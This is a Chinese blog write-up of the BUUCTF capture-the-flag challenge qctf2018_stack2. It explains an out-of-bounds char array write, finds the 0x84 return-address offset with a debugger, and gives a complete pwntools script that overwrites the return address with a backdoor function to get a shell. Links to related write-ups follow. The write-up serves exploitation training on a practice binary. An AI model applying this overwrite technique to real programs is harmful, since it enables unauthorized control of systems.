[BUUCTF]PWN——qctf2018_stack2

最新推荐文章于 2023-12-22 23:12:17 发布
最新推荐文章于 2023-12-22 23:12:17 发布
阅读量582 收藏 3
点赞数
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/115623202
版权

qctf2018_stack2

  1. 例行检查 ,32位程序,开启了canary和nx保护
    在这里插入图片描述

  2. 本地运行一下,看看大概的情况
    在这里插入图片描述

  3. 32位ida载入,检索字符串发现了后门
    在这里插入图片描述
    main函数太长了,贴一下关键部分,漏洞点在修改v13数组里的值。
    在这里插入图片描述

  4. 利用数组越界漏洞去修改ret,将ret修改成backdoor即可。
    一开始我想当然的认为偏移是0x70+4,但是实际利用的时候发现不对。动调找一下吧
    在这里插入图片描述
    我输入的数据是12,存储在了0xffffcf38处,v13数组的地址
    找一下函数结束的时候esp的地址
    在这里插入图片描述
    相差0xffffcfbc-0xffffcf38=0x84

  5. v13是char型,一次只能写入一个字节,因此要分四次来把ret修改成backdoor

from pwn import*
context.log_level = 'debug'
#p=remote('node3.buuoj.cn',28312)
p=process('./stack2')
elf=ELF('./stack2')

p.sendlineafter('have:','0')

offset=0x84

backdoor = [0x9b, 0x85, 0x04, 0x08]

for i in range(4):
	p.sendlineafter('5. exit','3')
	p.sendlineafter('change:',str(offset+i))
	p.sendlineafter('number:',str(backdoor[i]))


p.sendlineafter('5. exit','5')
p.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
qctf2018_stack2(数组越界,偏移寻找)
m0_51251108的博客
11-12 746
qctf2018_stack2: 程序分析: 漏洞出现在change这里,没有对v5作边界检查,我们能造成越界,直接读数到ret地址 后门函数: 两个小trick: 1.我们都会以为偏移是0x70+4,而实际却是0x84 跟着这位师傅的文章调试: https://zhuanlan.zhihu.com/p/301091515 首先ida找到首次出现v13的地方,可以看到在for循环里 我们接着看这部分的Text view 断点下在0x80486ae,得到v13真实地址为0xffffd028 继续调
QCTF2018stack2------<ASLR保护机制>
qq_21746331的博客
12-27 500
QCTF2018_stack2前言知识点详解0x1 ASLR保护机制writeupexp 前言 在最简单的栈溢出中,如果程序中存在获取shell的后门函数,则只需要简单的通过溢出手段将函数的返回地址修改为后门函数的地址,便可以轻松获取shell。而对于没有提供后门函数的程序,可以通过往栈里面写入shellcode,在返回的时候将控制流劫持到栈里面的shellcode获取shell。但是对于加入NX保护的程序,在栈中写入shellcode的方法则不再适用,而ROP就是其中一种绕过保护的手段。ROP的全称为R
qctf2018_stack2
Tw0的博客
02-20 173
数组越界类型的题目,难度基本上是签到级别,重点是要注意IDA反编译代码和直接查看汇编的结合。
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3410
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
[BUUCTF-pwn]——qctf2018_stack2
Y_peak的博客
04-02 355
[BUUCTF-pwn]——qctf2018_stack2 这道题注意一点v3的类型就好, 其他应该木有什么可以说的吧, 它是char*类型., 也就是每个我们赋值的v7只有低位的一个字节可以写进去 漏洞就在这里, 可以利用这里, 以v3为基准修改任意地址的数据. 还有一点需要注意的是偏移, 我最一开始写的时候, 想当然写成了0x40+4 主要原因是因为画圈的位置改变了esp, 懒得看汇编往上面找了直接动态调试. 第一次执行该汇编的时候, eax就是我们开始输入的位置 然后直接定位到retn看栈顶
Stack2 攻防世界题目分析
shanwei274的博客
04-18 1027
—XCTF 4th-QCTF-2018 前言,怎么说呢,这题目还是把我折磨的可以的,我一开始是没有看到后面的直接狙击的,只能说呢。 我的不经意间的粗心,破坏了你许多的温柔 1.气的我直接检查保护: 32位程序,开启了canary保护。 2.ida查看: 首先放的第一幅图片呢,是我一开始以为可以溢出的,也可以看见我旁边标注了一个maybeoverflow。 但是是不可以的,因为首先由于这里的 i 最大上限100,可能有的人头铁就要说了,这里v7可以慢慢溢出去修改i,(和我一样) 可是这里v13的存储位
学习笔记:buuctf pwn
RookieMOR的博客
06-18 456
学习笔记,有不对的请大家指出
XCTF 4th-QCTF-2018 pwn stack2 writeup
qq_39596232的博客
08-30 861
题目描述: 暂无 分析思路: 1、首先拿到ELF文件,我们首先查看一下详细信息: tucker@ubuntu:~/pwn$ file stack2 stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux...
[BackdoorCTF 2023] pwn
weixin_52640415的博客
12-22 659
libc2.35 uaf, 格式化字符串o
CTF pwn 方向部分题解
kali_Ma的博客
01-12 1308
dataleak 用”\或者/都可以跳过2个\x00,但是每次用”\会拷贝4个字节到buf中,导致最后的3字节数据无法泄露,所以用/\配合垃圾数据填充来控制泄露字符串。 exp: #!python #coding:utf-8 from pwn import * import subprocess, sys, os from time import sleep sa = lambda x, y: p.sendafter(x, y) sla = lambda x, y: p.sendlineafter(x
Web QCTF-WrtieUp-2018
大方子
08-20 2491
========================================= 个人收获: 1.php是弱类型语言  xx==xx 或者xx===xx存在被绕过可能 2.python 和404   要想到Flask jinja injection(SSTI) 3.python序列化后的格式类似于: a:5:{s:4:"name";s:6:"张三";s:3:"age";s:2:"22...
QCTF2018 Misc - picture writeup
xuchen16的博客
07-17 968
转载自:https://www.jianshu.com/p/55c5477567fe 看到提示(我承认我一开始没想到。。。。)解密图片,   之后拿到加密逻辑脚本,发现是DES的实现脚本,写出解密脚本 #_*_ coding:utf-8 _*_ import re import sys ip= (58, 50, 42, 34, 26, 18, 10, 2, ...
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值